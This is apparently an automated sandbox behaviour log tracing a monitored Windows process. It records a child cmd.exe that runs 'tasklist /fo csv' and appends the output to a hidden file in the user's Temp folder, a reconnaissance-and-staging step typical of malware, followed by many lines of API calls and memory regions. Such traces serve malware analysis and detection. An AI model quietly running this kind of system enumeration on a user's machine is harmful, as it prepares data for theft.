[0670.132] SafeArrayGetLBound (in: psa=0x234a10, nDim=0x1, plLbound=0x134d454 | out: plLbound=0x134d454) returned 0x0
[0670.132] SafeArrayGetUBound (in: psa=0x234a10, nDim=0x1, plUbound=0x134d460 | out: plUbound=0x134d460) returned 0x0
[0670.132] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x233ec0
[0670.132] SafeArrayGetDim (psa=0x234a10) returned 0x1
[0670.132] SafeArrayGetUBound (in: psa=0x234a10, nDim=0x1, plUbound=0x134d418 | out: plUbound=0x134d418) returned 0x0
[0670.132] SafeArrayGetElemsize (psa=0x234a10) returned 0x4
[0670.132] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.133] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.133] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.133] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.133] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.134] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.134] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.134] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.134] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.135] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.135] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.135] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.135] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.136] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.136] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.137] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.137] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.137] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.138] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.138] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.138] SafeArrayGetElement (in: psa=0x234a10, rgIndices=0x134d3b0, pv=0x134d3e0 | out: pv=0x134d3e0) returned 0x0
[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x203280, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x203284, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x203288, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x20328c, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x203290, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x203294, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x203298, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x20329c, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x2032a0, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x2032a4, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x2032a8, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x2032ac, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x2032b0, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032b4, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032b8, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032bc, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032c0, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032c4, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032c8, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032cc, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.142] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x233ec0 | out: hHeap=0x1c0000) returned 1
[0670.144] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa570 | out: hHeap=0x1c0000) returned 1
[0670.149] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fd9f0
[0670.149] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd9f0, pulNumLanguages=0x134e8a0 | out: pulNumLanguages=0x134e8a0) returned 1
[0670.149] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9f0 | out: hHeap=0x1c0000) returned 1
Thread:
id = 284
os_tid = 0x138
[0669.976] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.976] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.976] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.976] WaitForSingleObjectEx (hHandle=0x218, dwMilliseconds=0x493d0, bAlertable=0) returned 0x0
[0669.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.977] WaitForSingleObjectEx (hHandle=0x218, dwMilliseconds=0x2710, bAlertable=0) returned 0x102
[0679.981] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xaf68c650, dwHighDateTime=0x1dab599))
[0679.982] free (_Block=0x3ef040)
[0679.982] FreeLibrary (hLibModule=0x75830000) returned 1
[0679.986] free (_Block=0x403620)
[0679.987] free (_Block=0x3ed680)
[0679.988] WaitForSingleObjectEx (hHandle=0x218, dwMilliseconds=0xffffffff, bAlertable=0)
Process:
id = "35"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x46ffd000"
os_pid = "0x3f8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "30"
os_parent_pid = "0x598"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c tasklist /fo csv >> C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 5209
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 5210
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 5211
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 5212
start_va = 0x190000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 5213
start_va = 0x4a880000
end_va = 0x4a8d8fff
monitored = 1
entry_point = 0x4a8890b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 5214
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 5215
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 5216
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 5217
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 5218
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 5219
start_va = 0x7fffffd4000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 5220
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 5221
start_va = 0x50000
end_va = 0x14ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 5222
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 5223
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 5224
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 5225
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 5226
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 5227
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 5228
start_va = 0x290000
end_va = 0x2f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5229
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5230
start_va = 0x7fef72d0000
end_va = 0x7fef72d7fff
monitored = 0
entry_point = 0x7fef72d11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 5231
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5232
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5233
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5234
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5235
start_va = 0x300000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 5236
start_va = 0x300000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 5237
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 5238
start_va = 0x150000
end_va = 0x178fff
monitored = 0
entry_point = 0x151010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5239
start_va = 0x490000
end_va = 0x617fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000490000"
filename = ""
Region:
id = 5240
start_va = 0x150000
end_va = 0x178fff
monitored = 0
entry_point = 0x151010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5241
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5242
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5243
start_va = 0x620000
end_va = 0x7a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 5244
start_va = 0x7b0000
end_va = 0x1baffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007b0000"
filename = ""
Region:
id = 5245
start_va = 0x150000
end_va = 0x16ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 5246
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 5247
start_va = 0x180000
end_va = 0x180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 5248
start_va = 0x1bb0000
end_va = 0x1e7efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 257
os_tid = 0x138
[0571.838] GetProcAddress (hModule=0x77b10000, lpProcName="SetConsoleInputExeNameW") returned 0x77b20c80
[0571.838] GetProcessHeap () returned 0x50000
[0571.838] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x4012) returned 0x6aff0
[0571.838] GetProcessHeap () returned 0x50000
[0571.839] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x6aff0 | out: hHeap=0x50000) returned 1
[0571.840] _wcsicmp (_String1="tasklist", _String2=")") returned 75
[0571.840] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14
[0571.840] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14
[0571.840] _wcsicmp (_String1="IF", _String2="tasklist") returned -11
[0571.840] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11
[0571.840] _wcsicmp (_String1="REM", _String2="tasklist") returned -2
[0571.840] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2
[0571.840] GetProcessHeap () returned 0x50000
[0571.840] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0xb0) returned 0x69e40
[0571.840] GetProcessHeap () returned 0x50000
[0571.840] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x22) returned 0x64760
[0571.841] GetProcessHeap () returned 0x50000
[0571.841] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x24) returned 0x64790
[0571.841] GetProcessHeap () returned 0x50000
[0571.841] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x38) returned 0x667b0
[0571.846] GetProcessHeap () returned 0x50000
[0571.846] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x6a) returned 0x69f00
[0571.847] GetProcessHeap () returned 0x50000
[0571.847] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x28) returned 0x647c0
[0571.847] _get_osfhandle (_FileHandle=1) returned 0x7
[0571.847] _get_osfhandle (_FileHandle=1) returned 0x7
[0571.847] _get_osfhandle (_FileHandle=1) returned 0x7
[0571.847] GetFileType (hFile=0x7) returned 0x2
[0571.848] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0571.848] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28fb78 | out: lpMode=0x28fb78) returned 1
[0571.848] _dup (_FileHandle=1) returned 3
[0571.850] _close (_FileHandle=1) returned 0
[0571.851] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", _String2="con") returned -53
[0571.853] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x28fb28, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54
[0571.854] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 1
[0571.854] _get_osfhandle (_FileHandle=1) returned 0x54
[0571.854] GetFileType (hFile=0x54) returned 0x1
[0571.854] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41
[0571.854] SetFilePointer (in: hFile=0x54, lDistanceToMove=-1, lpDistanceToMoveHigh=0x28fb88*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x28fb88*=0) returned 0x40
[0571.854] ReadFile (in: hFile=0x54, lpBuffer=0x28fb78, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28fb20, lpOverlapped=0x0 | out: lpBuffer=0x28fb78*, lpNumberOfBytesRead=0x28fb20*=0x1, lpOverlapped=0x0) returned 1
[0571.855] GetConsoleTitleW (in: lpConsoleTitle=0x28fbb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0571.856] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16
[0571.856] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15
[0571.856] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16
[0571.856] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24
[0571.856] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17
[0571.856] _wcsicmp (_String1="tasklist", _String2="CD") returned 17
[0571.856] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17
[0571.856] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2
[0571.857] _wcsicmp (_String1="tasklist", _String2="REN") returned 2
[0571.857] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15
[0571.857] _wcsicmp (_String1="tasklist", _String2="SET") returned 1
[0571.857] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4
[0571.857] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16
[0571.857] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8
[0571.857] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4
[0571.857] _wcsicmp (_String1="tasklist", _String2="MD") returned 7
[0571.857] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7
[0571.857] _wcsicmp (_String1="tasklist", _String2="RD") returned 2
[0571.857] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2
[0571.857] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4
[0571.857] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13
[0571.857] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1
[0571.857] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17
[0571.857] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17
[0571.857] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2
[0571.857] _wcsicmp (_String1="tasklist", _String2="VER") returned -2
[0571.857] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2
[0571.857] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15
[0571.857] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1
[0571.857] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15
[0571.857] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8
[0571.857] _wcsicmp (_String1="tasklist", _String2="START") returned 1
[0571.857] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16
[0571.857] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9
[0571.858] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7
[0571.858] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4
[0571.858] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4
[0571.858] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19
[0571.858] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14
[0571.858] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18
[0571.858] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17
[0571.858] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7
[0571.858] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16
[0571.858] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15
[0571.858] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16
[0571.858] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24
[0571.858] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17
[0571.858] _wcsicmp (_String1="tasklist", _String2="CD") returned 17
[0571.858] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17
[0571.858] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2
[0571.858] _wcsicmp (_String1="tasklist", _String2="REN") returned 2
[0571.858] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15
[0571.858] _wcsicmp (_String1="tasklist", _String2="SET") returned 1
[0571.858] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4
[0571.858] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16
[0571.858] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8
[0571.858] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4
[0571.858] _wcsicmp (_String1="tasklist", _String2="MD") returned 7
[0571.858] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7
[0571.858] _wcsicmp (_String1="tasklist", _String2="RD") returned 2
[0571.858] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2
[0571.859] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4
[0571.859] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13
[0571.859] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1
[0571.859] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17
[0571.859] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17
[0571.859] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2
[0571.859] _wcsicmp (_String1="tasklist", _String2="VER") returned -2
[0571.859] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2
[0571.859] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15
[0571.859] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1
[0571.859] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15
[0571.859] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8
[0571.859] _wcsicmp (_String1="tasklist", _String2="START") returned 1
[0571.859] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16
[0571.859] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9
[0571.859] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7
[0571.859] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4
[0571.859] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4
[0571.859] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19
[0571.859] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14
[0571.859] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18
[0571.859] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17
[0571.859] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7
[0571.859] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14
[0571.859] _wcsicmp (_String1="tasklist", _String2="IF") returned 11
[0571.860] _wcsicmp (_String1="tasklist", _String2="REM") returned 2
[0571.860] GetProcessHeap () returned 0x50000
[0571.860] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x218) returned 0x69f80
[0571.860] GetProcessHeap () returned 0x50000
[0571.860] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x36) returned 0x66870
[0571.860] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17
[0571.861] GetProcessHeap () returned 0x50000
[0571.861] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x420) returned 0x6aff0
[0571.861] SetErrorMode (uMode=0x0) returned 0x0
[0571.861] SetErrorMode (uMode=0x1) returned 0x0
